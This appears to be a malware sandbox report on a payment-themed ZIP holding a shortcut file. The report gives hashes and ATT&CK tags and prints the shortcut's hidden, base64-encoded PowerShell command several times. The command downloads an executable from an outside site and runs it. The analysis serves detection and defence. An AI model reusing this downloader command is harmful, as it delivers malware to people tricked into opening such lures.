Malicious

Payment Swift copy.zip
ZIP Archive | MD5: d1f009e2fd65b43f2eb917a772fbb8d6 | Size: 2.54 KB | application/zip

Tags: Zip Archive | LNK | Malicious | LOLBin | LOLBin:powershell.exe | Execution: CMD in LNK | T1059.003 | T1202: Indirect Command Execution | T1204.002 | Execution: PowerShell in LNK | T1059.001 | PowerShell | Batch Command | PowerShell Call | DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics

Hashes
MD5: d1f009e2fd65b43f2eb917a772fbb8d6
SHA1: bcdc298cdd7eba27cfad2f824860f94faadf9e24
SHA256: 329ae4035bda94f3994dfc78d2bd771647e05cde4fe091ed076cea12f5831b81
SHA384: 1f7f2fc25d5af3e7417aa70b4ebe7cd097e04ecfe85a4a131516c3e13cdd249727e268ee345e223cf6cb3e763b927f9e
SHA512: 158a273d4278dc03e4f48dd570ccc3cf462f03b0370d3f6d05445472f1c75b690d74291357efbab5c1e9bb8ac7c124b017c71c89c2902150853a10699e9c1c56
SSDeep: 48:9iywvVA1zu7+TuSS8kWZTaWnywvVA1zu7+TuSS8kWZTaWU:YZvVA1K7+TuSSETaeZvVA1K7+TuSSET8
TLSH: B351D7A0740F6D74ED8AA7BE6088E8A92C4560CC6E65FF18A0C1EE55695634807B835A
File Structure

Payment Swift copy.zip (Zip Archive) - Malicious
  Tags: LNK | LOLBin | LOLBin:powershell.exe | Execution: CMD in LNK | T1059.003 | T1202: Indirect Command Execution | T1204.002 | Execution: PowerShell in LNK | T1059.001 | PowerShell | Batch Command | PowerShell Call | DeObfuscated
  Details of Transaction.lnk (Archive Entry, LNK) - Malicious
    Tags: LOLBin | LOLBin:powershell.exe | Execution: CMD in LNK | T1059.003 | T1202: Indirect Command Execution | T1204.002 | Execution: PowerShell in LNK | T1059.001 | PowerShell | Batch Command | PowerShell Call | DeObfuscated
    LNK CommandLine - Malicious
      Tags: PowerShell | Batch Command | PowerShell Call | DeObfuscated | Contains Base64 Block | Base64 Block | Powershell: Hidden Execution
      [Deobfuscated PS] - Malicious
        Tags: DeObfuscated | PowerShell | Contains Base64 Block | Base64 Block
      [Base64-Block]
        Tags: Base64 Block
      [PowerShell Command] - Malicious
        Tags: PowerShell | DeObfuscated | Contains Base64 Block | Base64 Block
      [Deobfuscated PS] - Malicious
        Tags: DeObfuscated | PowerShell | Contains Base64 Block | Base64 Block
      [Lnk Summary] - Malicious
        Tags: PowerShell | Contains Base64 Block | Base64 Block | DeObfuscated
      [PowerShell Command] - Malicious
        Tags: PowerShell | Contains Base64 Block | Base64 Block
      [Deobfuscated PS] - Malicious
        Tags: DeObfuscated | PowerShell | Contains Base64 Block | Base64 Block
      [Deobfuscated PS] - Malicious
        Tags: DeObfuscated | PowerShell | Contains Base64 Block | Base64 Block
Characteristics
No malware configuration was found at this point.
Artefacts

Name: LNK: Command Execution
Verdict: Malicious
Location: Payment Swift copy.zip > Details of Transaction.lnk
Value:
powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine
Value:
-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine > [Deobfuscated PS]
Value:
-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine > [PowerShell Command]
Value:
Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: Payment Swift copy.zip > Details of Transaction.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS]
Value:
Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))
